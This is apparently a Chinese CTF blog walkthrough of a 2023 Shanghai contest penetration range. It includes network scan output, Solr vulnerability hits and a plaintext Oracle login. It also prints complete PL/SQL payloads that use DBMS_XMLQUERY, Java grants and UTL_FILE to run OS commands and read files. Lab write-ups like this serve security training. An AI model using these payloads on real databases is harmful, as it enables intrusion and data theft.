(icmp) Target 192.168.33.172 is alive
[*] Icmp alive hosts len is: 4
192.168.33.5:445 open
192.168.33.172:1521 open
192.168.33.172:445 open
192.168.33.170:445 open
192.168.33.5:139 open
192.168.33.172:139 open
192.168.33.170:139 open
192.168.33.5:135 open
192.168.33.172:135 open
192.168.33.170:135 open
192.168.33.39:22 open
192.168.33.5:88 open
192.168.33.39:8983 open
[*] alive ports len is: 13
start vulscan
[*] NetInfo:
[*]192.168.33.170
[->]DBserver
[->]192.168.33.170
[*] NetBios: 192.168.33.5 [+]DC FOUR\AD4
[*] NetBios: 192.168.33.170 FOUR\DBSERVER
[*] NetBios: 192.168.33.172 FOUR\SERVER
[*] NetInfo:
[*]192.168.33.172
[->]server
[->]192.168.33.172
[*] WebTitle: http://192.168.33.39:8983 code:302 len:0 title:None 跳转url: http://192.168.33.39:8983/solr/
[*] NetInfo:
[*]192.168.33.5
[->]AD4
[->]192.168.33.5
[*] WebTitle: http://192.168.33.39:8983/solr/ code:200 len:14543 title:Solr Admin
[+] http://192.168.33.39:8983 poc-yaml-solr-cve-2019-0193
[+] http://192.168.33.39:8983 poc-yaml-solr-velocity-template-rce
起个代理到内网
flag2 192.168.33.172 FOUR\SERVER Oracle db
history
sqlplus
system/Zr6kJG2U3m3A7BG@192.168.1.100:1521/orcl
192.168.33.172:1521
select * from v$version;
Oracle Database 11g Enterprise Edition Release 11.2.0.1.0 - 64bit Production
PL/SQL Release 11.2.0.1.0 - Production
CORE11.2.0.1.0Production
TNS for 64-bit Windows: Version 11.2.0.1.0 - Production
NLSRTL Version 11.2.0.1.0 - Production
命令执行 DBMS_XMLQUERY
select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}}'';commit;end;') from dual;
select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ''''LinxUtil.runCMD(java.lang.String) return String''''; '';commit;end;') from dual;
select OBJECT_ID from all_objects where object_name ='LINXRUNCMD';
DECLARE
POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
CURSOR C1 IS SELECT 'GRANT',USER(),'SYS','java.io.FilePermission','<<ALL FILES>>','execute','ENABLED' FROM DUAL;
BEGIN
OPEN C1;
FETCH C1 BULK COLLECT INTO POL;
CLOSE C1;
DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
END;
/
DECLARE
POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
CURSOR C1 IS SELECT 'GRANT',USER(),'SYS','java.lang.RuntimePermission','writeFileDescriptor',NULL,'ENABLED' FROM DUAL;
BEGIN
OPEN C1;
FETCH C1 BULK COLLECT INTO POL;
CLOSE C1;
DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
END;
/
DECLARE
POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
CURSOR C1 IS SELECT 'GRANT',USER(),'SYS','java.lang.RuntimePermission','readFileDescriptor',NULL,'ENABLED' FROM DUAL;
BEGIN
OPEN C1;
FETCH C1 BULK COLLECT INTO POL;
CLOSE C1;
DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
END;
/
执行命令:
select LinxRUNCMD('whoami') from dual;
发现不能有空格。。
https://github.com/jas502n/oracleShell
这工具感觉只支持 Linux 的命令执行,还得手动读文件。。
数据库读取文件方式总结
https://uuzdaisuki.com/2020/07/10/数据库读取文件方式总结/
create or replace directory user_dir as 'C:\Users\Administrator\Desktop\';
grant read on directory user_dir to public;
grant write on directory user_dir to public;
select * from dba_directories;
declare
F1 utl_file.file_type;
V1 varchar2(32767);
begin
F1:=utl_file.fopen('USER_DIR','flag','r');
utl_file.get_line(F1,V1,50);
utl_file.fclose(F1);
dbms_output.put_line(V1);
end;
小结
于是通宵打了两天漏洞渗透靶场,累死了
感觉Windows攻防这一块喵喵还不大熟悉,后面有机会有空的话再来补一补.jpg ~~(咕咕咕~~)
吐槽一下怎么不是所有机器都有flag,好不容易日了一台机器下来,上去发现啥都没有,好亏啊!
然后又想到去年线下打鹏城杯那个靶场,靶机里数据库web服务root下好几个地方放了flag,虽然容易漏但是至少拿下机器shell有flag的反馈还是挺乐的,虽然打得也挺累的就是了。
还有个挺坑的地方是,他靶机的DNS都配的是192.168下的,但是那个IP又连不通,于是如果反弹shell或者下载带域名的URL就解析不出来了,整的喵喵还以为不通外网,后来直接试IP发现能访问才猜到是这样的。
而且VPN网段不能弹shell回来,中间的路由直接丢了,而且通过VPN访问也是走的中间的机器跳过去的
(不过这漏洞挖掘的比赛也好卷啊!)
喵喵一个人拿了1k分,也就是拿了5个flag,人麻了
可惜最后CTF和漏洞挖掘居然是按照7:3的比例把分数加起来,感觉亏死了!!!
于是连着打了三天,累累,呜呜
不过说来这应该是喵喵最后一次打上海市赛了吧(喵呜喵呜喵)
(溜了溜了喵)
往期推荐
原创 | 2023年第八届上海市大学生网络安全大赛 / 磐石行动 漏洞挖掘 Workthrough(上)